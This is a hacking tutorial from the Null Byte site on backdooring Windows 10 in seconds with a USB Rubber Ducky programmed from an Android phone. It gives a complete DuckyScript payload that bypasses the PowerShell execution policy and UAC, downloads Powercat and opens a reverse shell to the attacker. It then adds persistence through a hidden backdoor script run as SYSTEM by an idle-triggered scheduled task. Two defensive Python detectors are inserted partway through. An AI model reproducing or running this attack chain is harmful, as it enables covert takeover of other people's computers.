
Android for Hackers: How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky « Null Byte :: WonderHowTo



With an inconspicuous Android phone and a USB flash drive, an attacker can compromise a Windows 10 computer in less than 15 seconds. Once a root shell has been established, long-lasting persistence for the backdoor can be configured with just two simple commands, all while bypassing antivirus and Windows Defender.

How this attack works

Powercat is a full-featured PowerShell module. It works much like Netcat and allows PowerShell users to create TCP and UDP tunnels with simple command line arguments. A PowerShell payload will be created to download, import and execute Powercat in a single command. Then it will be encoded into a binary format that USB Rubber Ducky can understand.

With the USB Rubber Ducky, Powercat is executed on Windows 10 as an administrator, which quickly establishes a root shell back to the attacker's Netcat listener. At that point, persistence is configured with the schtasks command, a tool designed by Microsoft to automate tasks and commands in Windows 10.

Prerequisites

Some hardware is required to perform this hack, as some of you may have already guessed. Below are the four key items.

1. USB Rubber Ducky

The USB Rubber Ducky identifies itself as a keyboard when inserted into a computer and then automatically types the malicious commands that are pre-programmed into its payload. The payload can be adapted to perform a myriad of advanced functions. Prices for the USB Rubber Ducky from Hak5 start at $45.


What the USB Rubber Ducky looks like without its shell. Image by tokyoneon/Null Byte

As an alternative to the USB Rubber Ducky, the NetHunter and DroidDucky projects can turn Android devices into keystroke injection tools. Unfortunately, they require modifying the Android operating system, which is outside the scope of this article. Both NetHunter and DroidDucky are great projects for those who are willing to change their phone's operating system. Imagine connecting an Android phone to any computer and having it run complex PowerShell payloads in seconds, with no USB Rubber Ducky required.

2. Android Device with UserLAnd Installed

Any Android phone or tablet that can run the UserLAnd app will do. The device does not need to be rooted. All that is required is internet access via Wi-Fi and the UserLAnd application mentioned above.


3. OTG Adapter (Conditional)

After creating the PowerShell payload (in a later step), it must be moved onto the microSD card in the USB Rubber Ducky. Some Android phone and tablet models have a microSD expansion slot for additional storage; if you have one of those, you are good to go, because you can transfer the file that way.

If the device does not have a microSD slot, you will need an OTG adapter of some kind, which lets you connect memory cards to your device via the charging port. An all-in-one solution is the Monoprice USB-C microSD reader if your phone has a USB Type-C port. Lexar makes a similar product for Micro-USB ports.

Since the USB Rubber Ducky comes with a microSD-to-USB adapter, you can instead choose an OTG adapter with a female USB Type-A end to plug the microSD adapter into. If you have a USB-C port on your Android device, Aukey makes a good adapter. For Micro-USB ports, there are many inexpensive options, such as Ugreen's cable.

Image by tokyoneon/Null Byte

Alternatively, a combination of adapters can get the job done. As you can see below, I use an auxiliary adapter together with an Anker portable card reader.

Image by tokyoneon/Null Byte

4. Virtual Private Server (Optional)

A virtual private server (VPS) may be required, depending on the attack scenario. If a Wi-Fi network is shared with the target device, it is best to embed the attacker's local IP address into the payload. In other scenarios, it may be necessary to deploy a VPS or an Ngrok server.

Step 1: Getting Started with UserLAnd

Before moving forward, check out distortion's guide on turning an Android phone into a hacking device without root, as well as my WPA2 Wi-Fi password guide for Android, because they cover the basics of UserLAnd, the configuration of Kali Linux and Ngrok, and the installation of software that will be required to follow this article. You must install and configure UserLAnd, create a new file system, and connect to the operating system via SSH with ConnectBot (or JuiceSSH or the built-in SSH client).

Step 2: Update System & Install Essential Software

As with all Unix-based systems, it is a good idea to make sure the installed packages are fully up to date before continuing with projects. Update the system, install the necessary software, and install Java (needed for the USB Rubber Ducky encoder) with the commands below.

  sudo apt-get update && sudo apt-get dist-upgrade 

This command can take several minutes to complete depending on available internet speed and Android CPU. Older Android devices take longer to download and decompress packages.

To install the necessary software, use the command below.

  sudo apt-get update && sudo apt-get install net-tools netcat gnupg curl wget git nano screen

Java is required to compile the Ducky payload. To install it, use the command below.

  sudo apt-get install default-jre-headless 

Restart the Android device to ensure that all package and kernel updates take effect the next time Android starts the UserLAnd Kali OS.

Step 3: Start the Netcat Listener

Depending on the attack scenario, there are several ways to configure the Netcat listener that will allow remote access to the target Windows computer.

In any case, it is a good idea to use Screen so that terminal sessions persist even when the SSH connection is closed. Screen lets users manage multiple terminal sessions within the same console. Readers are encouraged to learn how to use Screen, as it makes it easy to navigate and "detach" multiple terminal sessions without losing data.

To start a new Screen session, just type screen.

screen

Use the ifconfig -a command to identify the local IP address used by the system. This IP will be required in the next step when creating the payload.

  ifconfig -a
  wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
          inet 192.168.0.208  netmask 255.255.255.0  broadcast 192.168.0.255
          inet6 :::::  prefixlen 64  scopeid 0x20<link>
          unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
          RX packets 95745  bytes 115985231 (110.6 MiB)
          RX errors 0  dropped 0  overruns 0  frame 0
          TX packets 44735  bytes 4289090 (4.0 MiB)
          TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

In the UserLAnd Kali OS there will be many available interfaces. The "wlan0" or "wlan1" interface is likely to hold the device's local IP address (192.168.0.208). VPS users will instead embed the same external IP address used when SSHing into the server. Ngrok users must configure a server and embed the URL into the payload.

Finally, start the Netcat listener with the command below.

  nc -vv -l -p 1234

Using port (-p) 1234, Netcat will listen (-l) on all available interfaces. The -vv (very verbose) flag prints the target's IP address in the terminal when a new connection is established.

Step 4: Create the Payload

After Android restarts, launch the UserLAnd app and SSH into the Kali system. Use nano to create a new "payload.txt" file in the home (~/) directory.

  nano ~/payload.txt

Comments (REM) have been added to explain what each line in the payload does.

  REM This first delay pauses the Ducky for 5.5 seconds to give the target
  REM operating system some time to mount the USB as a keyboard device.
  DELAY 5500
  REM Opens the Windows Run prompt.
  GUI r
  REM Delays .7 seconds to give the Run prompt time to open.
  DELAY 700
  REM Types the PowerShell payload.
  STRING powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell
  REM Presses Ctrl + Shift + Enter to run PowerShell with administrative permissions.
  CTRL-SHIFT ENTER
  REM Delays .85 seconds to give the UAC prompt time to open.
  DELAY 850
  REM Presses Alt + Y to bypass UAC.
  ALT y

The PowerShell one-liner does a lot. It is several commands chained together and separated by semicolons.

  • $a=$env:TEMP – The target's temp directory is stored in the variable $a. This variable is used twice later in the script: first as the output directory for powercat.ps1, and again when the script is imported. Using a single-letter variable helps shorten the total length of the payload; it is more efficient than typing "C:\Users\%USERNAME%\AppData\Local\Temp" several times.
  • Set-ExecutionPolicy Bypass – The execution policy is a security feature of PowerShell that prevents many PowerShell payloads like this one from running. In several tests I found that -ExecutionPolicy alone was not enough to bypass this security feature. As an administrator, the policy can be bypassed.
  • wget https://cutt.ly/cW13i -o $a\d.ps1 – PowerShell is instructed to make a web request (wget, an alias of Invoke-WebRequest) and download powercat.ps1 via the shortened cutt.ly URL. This URL links directly to the Powercat GitHub page, but it can be changed to the full URL or another shortened URL. Powercat.ps1 is saved (-o) to the temp directory ($a) with the file name "d.ps1". The file name was shortened to a single letter to keep the Ducky payload as short as possible.
  • ipmo $a\d.ps1 – PowerShell's Import-Module feature is called via its alias ipmo, again using the shorter form of the command to keep the Ducky payload short. Powercat.ps1 is imported.
  • powercat -c 192.168.0.208 -p 1234 -e powershell – Finally, Powercat is run and instructed to connect (-c) to the attacker's server (192.168.0.208) on port (-p) 1234 and execute (-e) PowerShell once the connection is established. This effectively gives the attacker remote access to a root PowerShell terminal.

The REM comments can remain in the payload and do not affect the keystroke injection. To save and exit nano, press Ctrl-X, then Y, then Enter.
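On the defending side, the chain just described (hidden window, execution-policy bypass, download cradle, import of a .ps1 from TEMP, outbound connect with -e) is exactly what a process-creation event records. The following Python is an added example, not code from the original article: it scores constructed command-line records against those indicators and alerts only when several of them co-occur, so that an administrator's ordinary hidden, policy-bypassing script does not fire.

```python
"""Detection logic for the download-import-connect PowerShell chain shown
above, run over constructed process-creation records. Added example, not
part of the original article; the records are made up, not captured."""
import re

# (indicator name, case-insensitive regex). Each one alone is common in
# admin scripting; it is the combination that characterises this payload.
INDICATORS = [
    ("hidden_window", r"(?:^|\s)[-/]w(?:indowstyle)?\s+(?:1|hidden)\b"),
    ("execpolicy_bypass", r"Set-ExecutionPolicy\s+Bypass|[-/]e(?:xecutionpolicy|p)\s+bypass"),
    ("download_cradle", r"\b(?:wget|iwr|curl|Invoke-WebRequest|DownloadString|DownloadFile)\b"),
    ("import_ps1_module", r"\b(?:ipmo|Import-Module)\s+\S+\.ps1"),
    ("reverse_connect", r"powercat\s+[^;]*-c\s+\d{1,3}(?:\.\d{1,3}){3}[^;]*-e\s+powershell"),
]


def score_command_line(cmdline: str) -> list[str]:
    """Return the names of every indicator present in one command line."""
    return [name for name, pat in INDICATORS if re.search(pat, cmdline, re.IGNORECASE)]


def triage(records: list[dict], threshold: int = 3) -> list[dict]:
    """Return PowerShell process records that hit at least `threshold` indicators.
    One hit (a plain download) is noise; three or more is the full chain."""
    alerts = []
    for rec in records:
        if not rec["image"].lower().endswith("powershell.exe"):
            continue
        hits = score_command_line(rec["cmdline"])
        if len(hits) >= threshold:
            alerts.append({**rec, "hits": hits})
    return alerts


# Constructed records in the shape of a process-creation event (Sysmon ID 1
# or Security 4688). Record 4412 mirrors the Ducky one-liner: explorer.exe is
# the parent because the Run prompt launched it. The others are benign admin use.
SAMPLE_RECORDS = [
    {"pid": 4412, "parent": "explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell"},
    {"pid": 5120, "parent": "svchost.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -ep bypass -File C:\it\inventory.ps1"},
    {"pid": 6008, "parent": "cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},
    {"pid": 6210, "parent": "explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe -w 1 bypass"},  # not PowerShell, so never scored
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(f"ALERT pid={alert['pid']} parent={alert['parent']} hits={alert['hits']}")
```

Lowering the threshold to 2 also surfaces the inventory script, which is the trade-off a detection engineer tunes against the environment's baseline.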

Step 5: Encode the Payload

The USB Rubber Ducky payload cannot be loaded onto the microSD card in plain text. Instead, Hak5's Duck Encoder is used to convert the plain-text payload into a binary format.

To clone the Duck Encoder repository, use the command below.

  git clone https://github.com/hak5darren/USB-Rubber-Ducky/

Change (cd) into the newly created Encoder/ directory.

  cd USB-Rubber-Ducky/Encoder/

Then encode payload.txt with the command below. This command uses encoder.jar to convert the input (-i) into the required "inject.bin" output (-o) binary. The output file name is not arbitrary: it must be named "inject.bin" for the Ducky to perform keystroke injection.

  java -jar encoder.jar -i ~/payload.txt -o inject.bin
  Hak5 Duck Encoder 2.6.4

  Loading File .....		[ OK ]
  Loading Keyboard File .....	[ OK ]
  Loading Language File .....	[ OK ]
  Loading DuckyScript .....	[ OK ]
  DuckyScript Complete .....	[ OK ]

When it completes, there will be a new "inject.bin" file in the Encoder/ directory. This can be verified with the ls -l command below.

  ls -l
  -rw-r--r--. 1 root root  1466 Jan 11 11:39 README
  -rw-r--r--. 1 root root 57535 Jan 11 11:39 encoder.jar
  -rw-r--r--. 1 root root    86 Jan 12 01:57 inject.bin
  drwxr-xr-x. 2 root root  4096 Jan 11 11:39 resources
  drwxr-xr-x. 2 root root  4096 Jan 11 11:39 src

Step 6: Connect the Ducky MicroSD to the Android Device

Using the card reader adapter, the internal microSD slot, or an OTG adapter with a card reader, insert the Ducky's microSD card into the Android device. The microSD card's contents can be viewed using Android's Downloads app.

Image by tokyoneon/Null Byte

After a few seconds, a new removable device will be available in the Downloads app. Navigate back to the Kali OS terminal. Kali OS does not have access to external storage devices (i.e. the microSD card), so "inject.bin" must first be copied (cp) to the /sdcard/Download/ directory, then copied to the microSD card using the Android OS.

  cp ~/USB-Rubber-Ducky/Encoder/inject.bin /sdcard/Download/

It now appears in the Downloads app.

Highlight "inject.bin" and press the "Copy to" button. Then copy it to the microSD card and safely eject the microSD card from your Android device.

Step 7: Let the Hacking Begin

Insert the USB Rubber Ducky into the target Windows 10 machine, and a new connection to the Android device will be established.

  nc -vv -l -p 1234
  Ncat: Version 7.70 (https://nmap.org/ncat)
  Ncat: Connection from 192.168.0.33.
  Ncat: Connection from 192.168.0.33:49672.
  Windows PowerShell
  Copyright (C) Microsoft Corporation. All rights reserved.

  PS C:\Windows\System32>

Netcat reports a new "Connection from xx.xx.xx.xx" line containing the target's IP address. Running a command such as ls or pwd will list the files in the current directory or print the current directory name.

Step 8: Establish Persistence (Optional)

The first thing to do after obtaining a reverse shell is to establish persistence in case the current connection is lost. This is an optional step, but it is recommended where long-term access is desirable. In Windows 10, there are many ways to establish persistence. Below is one option.

The schtasks command can be used to schedule tasks for Windows 10 to perform automatically. For example, Windows 10 could be made to connect to the attacker's server every X minutes, where X is an arbitrary interval, e.g. 10 minutes or 120 minutes.

Schtasks has a useful feature for running commands only when the computer is idle, which gets around the target noticing the split-second flash of the terminal window created by PowerShell. So if the screen has gone to sleep or the screen saver is running, only then will it attempt to connect to the attacker's server. This is ideal for having the terminal pop up only when the owner of the computer is away from the device.

The schtasks command has a ~175 character limit on the command it runs, which can make running long commands challenging. To quickly get around this, first create a "backdoor.ps1" file containing the Powercat download, import and run commands.

  echo "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.0.208 -p 2 -e powershell" > C:\ProgramData\Microsoft\Windows\backdoor.ps1

The Windows directory is used to store backdoor.ps1, but this location is entirely optional. The directory and file name can be changed to better hide the script's location and prevent the target from discovering it. Similarly, the port number (-p 2) can be changed to another port.

Then use schtasks to run "backdoor.ps1" whenever the computer becomes idle.

  schtasks /create /f /ru "NT AUTHORITY\SYSTEM" /tn "backdoor" /tr "powershell -w 1 -ep bypass C:\ProgramData\Microsoft\Windows\backdoor.ps1" /sc onidle /i 1
  SUCCESS: The scheduled task "backdoor" has been successfully created.

Task Scheduler (schtasks) creates a task named (/tn) "backdoor", forcibly (/f) overwriting any task of that name, and running it (/ru) as the NT AUTHORITY\SYSTEM account. The task to run (/tr) will execute the backdoor.ps1 script. The schedule (/sc) on which the command runs is set to "onidle", which instructs the computer to run the command only when the device is idle. Finally, the idle time in minutes is given by the /i argument and is set to 1 minute.

In short, one minute after the [target] steps away from the computer, it will attempt to run backdoor.ps1 from the Microsoft directory. Keep in mind that when the target returns, the connection is automatically terminated by Windows 10. The connection will only persist while the target is away from the computer. Restart the Netcat listener and wait for the computer to become idle again; a new connection will be attempted each time.
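From the defender's side, the task this step creates has a recognisable shape once exported with schtasks /query /xml: an idle trigger, the SYSTEM principal, and a PowerShell action with a hidden window and the execution policy bypassed. The Python below is an added example, not from the original article; it parses constructed task XML (the script path in it is a placeholder) and only flags a task when several of those properties coincide, since a SYSTEM task or an idle trigger alone is ordinary.

```python
"""Audit an exported Task Scheduler definition for the idle-triggered,
SYSTEM-run, hidden PowerShell task described above. Added example, not from
the original article; both XML documents below are constructed to mirror
`schtasks /query /xml` output, and the script path is a placeholder."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_SID = "S-1-5-18"  # what /ru "NT AUTHORITY\SYSTEM" is stored as
RISKY_ARGS = ("-ep bypass", "-executionpolicy bypass", "-w 1", "-w hidden", "-windowstyle hidden")


def audit_task_xml(task_name: str, xml_text: str) -> dict:
    """Return {'task', 'reasons', 'suspicious'}. Two or more reasons are needed,
    because a SYSTEM task or an idle trigger on its own is ordinary."""
    root = ET.fromstring(xml_text)
    reasons = []
    if root.find("t:Triggers/t:IdleTrigger", NS) is not None:  # /sc onidle
        reasons.append("idle trigger")
    user_id = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    if user_id.upper() == SYSTEM_SID:  # /ru "NT AUTHORITY\SYSTEM"
        reasons.append("runs as SYSTEM")
    for action in root.findall("t:Actions/t:Exec", NS):  # /tr "..."
        command = action.findtext("t:Command", default="", namespaces=NS).lower()
        args = action.findtext("t:Arguments", default="", namespaces=NS).lower()
        if "powershell" not in command and "pwsh" not in command:
            continue
        found = [flag for flag in RISKY_ARGS if flag in args]
        if found:
            reasons.append("powershell with " + ", ".join(found))
        if ".ps1" in args:
            reasons.append("executes a .ps1 script")
    return {"task": task_name, "reasons": reasons, "suspicious": len(reasons) >= 2}


# Constructed export of the task created in this step (script path is a placeholder).
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><IdleTrigger><Enabled>true</Enabled></IdleTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell</Command>
    <Arguments>-w 1 -ep bypass C:\PLACEHOLDER\backdoor.ps1</Arguments></Exec></Actions>
</Task>"""

# Constructed benign task: also SYSTEM, but a daily trigger and a vendor binary under Program Files.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2019-01-12T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files\ExampleBackup\backup.exe</Command>
    <Arguments>--nightly</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("backdoor", SUSPICIOUS_TASK_XML), ("NightlyBackup", BENIGN_TASK_XML)):
        print(audit_task_xml(name, xml))
```

On a live host the same function can be fed the output of schtasks /query /xml for every task, which is the cheapest way to enumerate this persistence technique.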

Now start a new Netcat listener and wait for the Windows machine to become idle.

  nc -vv -l -p 2
  Ncat: Version 7.70 (https://nmap.org/ncat)
  Ncat: Connection from 192.168.0.33.
  Ncat: Connection from 192.168.0.33:24276.
  Windows PowerShell
  Copyright (C) Microsoft Corporation. All rights reserved.

  PS C:\Windows\System32>

Schtasks is great fun to experiment with. For more on the available arguments, use the commands schtasks /? and schtasks /Create /? as shown below.

  schtasks /Create /?

More Android & PowerShell Hacks to Come

With an Android device and a small USB device, an attacker can wreak havoc on a network of Windows computers. With only 15 seconds of physical access required to deliver the payload, an administrative shell can be established and long-lasting persistence embedded in the machine.

Android with UserLAnd works well as a hacking device. However, there are some limitations. The CPU doesn't really have what it takes to run whole frameworks like Metasploit, Empire and Wine. In future articles, we will have fun with advanced post-exploitation attacks such as capturing keystrokes and recording audio through the microphone, using only Android and PowerShell.

Cover photo and screenshots by tokyoneon/Null Byte
